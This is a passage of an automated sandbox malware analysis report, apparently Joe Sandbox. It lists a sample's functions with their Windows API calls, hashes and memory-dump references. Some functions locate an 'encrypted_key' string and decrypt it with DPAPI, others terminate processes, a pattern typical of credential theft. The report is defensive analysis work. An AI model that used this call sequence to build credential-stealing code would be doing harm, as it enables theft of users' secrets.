                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00999D39
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                          • Part of subcall function 00999AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                          • Part of subcall function 00999AC0: LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                          • Part of subcall function 00999B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00999B84
                          • Part of subcall function 00999B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00999BA3
                          • Part of subcall function 00999B60: LocalFree.KERNEL32(?), ref: 00999BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: e2dffdacac1620dda34f0565c3ef4d87492ad283923a7e44d6e5a3fda08fcfb0
                        • Instruction ID: 072b68c458ffe376a31865d1651f40dc05a5272cdedcb1814d5f4f090b66ea5a
                        • Opcode Fuzzy Hash: e2dffdacac1620dda34f0565c3ef4d87492ad283923a7e44d6e5a3fda08fcfb0
                        • Instruction Fuzzy Hash: 7A313275D10109ABCF04DBE8DD85BEFB7B8AB99304F144519F905A7281E7349A04CBA1
                        Function 009A94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 009A94EB
                          • Part of subcall function 009A8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009A951E,00000000), ref: 009A8D5B
                          • Part of subcall function 009A8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009A8D62
                          • Part of subcall function 009A8D50: wsprintfW.USER32 ref: 009A8D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009A95AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 009A95C9
                        • CloseHandle.KERNEL32(00000000), ref: 009A95D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 5d4a0501fa421a4c5e4504c9cdd0a91f8b32268ef1cd8ce1d2cca90589d7072f
                        • Instruction ID: 206b4cbc4bc709a58dabd9ec71e6f75903cd4bd80dbd02794cd00126b61e1a5d
                        • Opcode Fuzzy Hash: 5d4a0501fa421a4c5e4504c9cdd0a91f8b32268ef1cd8ce1d2cca90589d7072f
                        • Instruction Fuzzy Hash: 1E312D71E012089FDB14DFD0CD59BEDB7B8FB45700F104459F906AB184EB74AA89DB91
                        Function 009A92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(009A3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009A3AEE,?), ref: 009A92FC
                        • GetFileSizeEx.KERNEL32(000000FF,009A3AEE), ref: 009A9319
                        • CloseHandle.KERNEL32(000000FF), ref: 009A9327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: ef9c8014ae6d1405c9aa1eacc4bed1f8462de01588117bf59661f8a65b10585d
                        • Instruction ID: 95b6b6576cacecb1a1d720325706899d404d78908017dc591e7c7679f6cb67bc
                        • Opcode Fuzzy Hash: ef9c8014ae6d1405c9aa1eacc4bed1f8462de01588117bf59661f8a65b10585d
                        • Instruction Fuzzy Hash: 89F04F35E40208BBDF10DFB0DC59F9EB7B9BB48711F10C694B651A72C0EE749A018B80
                        Function 009AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 009AC74E
                          • Part of subcall function 009ABF9F: __amsg_exit.LIBCMT ref: 009ABFAF
                        • __getptd.LIBCMT ref: 009AC765
                        • __amsg_exit.LIBCMT ref: 009AC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 009AC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: be4e2bfd73f720f8b364351e51c06ab86196d7e7304e924bb925daaa2901c7c1
                        • Instruction ID: 76f27502419bf8dace5e37e5ea0bde2ca6681a656a58c4cfb35d6e654ecd0030
                        • Opcode Fuzzy Hash: be4e2bfd73f720f8b364351e51c06ab86196d7e7304e924bb925daaa2901c7c1
                        • Instruction Fuzzy Hash: 2DF09AB29042109FD721BBB89806B8E33A06F82724F244249F404AA2D3CBA459809FD6
                        Function 009A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4F7A
                        • lstrcat.KERNEL32(?,009B1070), ref: 009A4F97
                        • lstrcat.KERNEL32(?,015B8890), ref: 009A4FAB
                        • lstrcat.KERNEL32(?,009B1074), ref: 009A4FBD
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A492C
                          • Part of subcall function 009A4910: FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                          • Part of subcall function 009A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                          • Part of subcall function 009A4910: FindClose.KERNEL32(000000FF), ref: 009A4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 5ef426400649c8580cfa7a57fec95b56d462eb277ddbaf49da73760e763b9447
                        • Instruction ID: 49a2388b9f8dc37a9f875b7ac6210f266a634ac67f8c6e285eb7ebc1a7d1e404
                        • Opcode Fuzzy Hash: 5ef426400649c8580cfa7a57fec95b56d462eb277ddbaf49da73760e763b9447
                        • Instruction Fuzzy Hash: B821C87690020867C754FBB0EC56FEA733CABD5700F404585B64993181FE75AAC8CBD2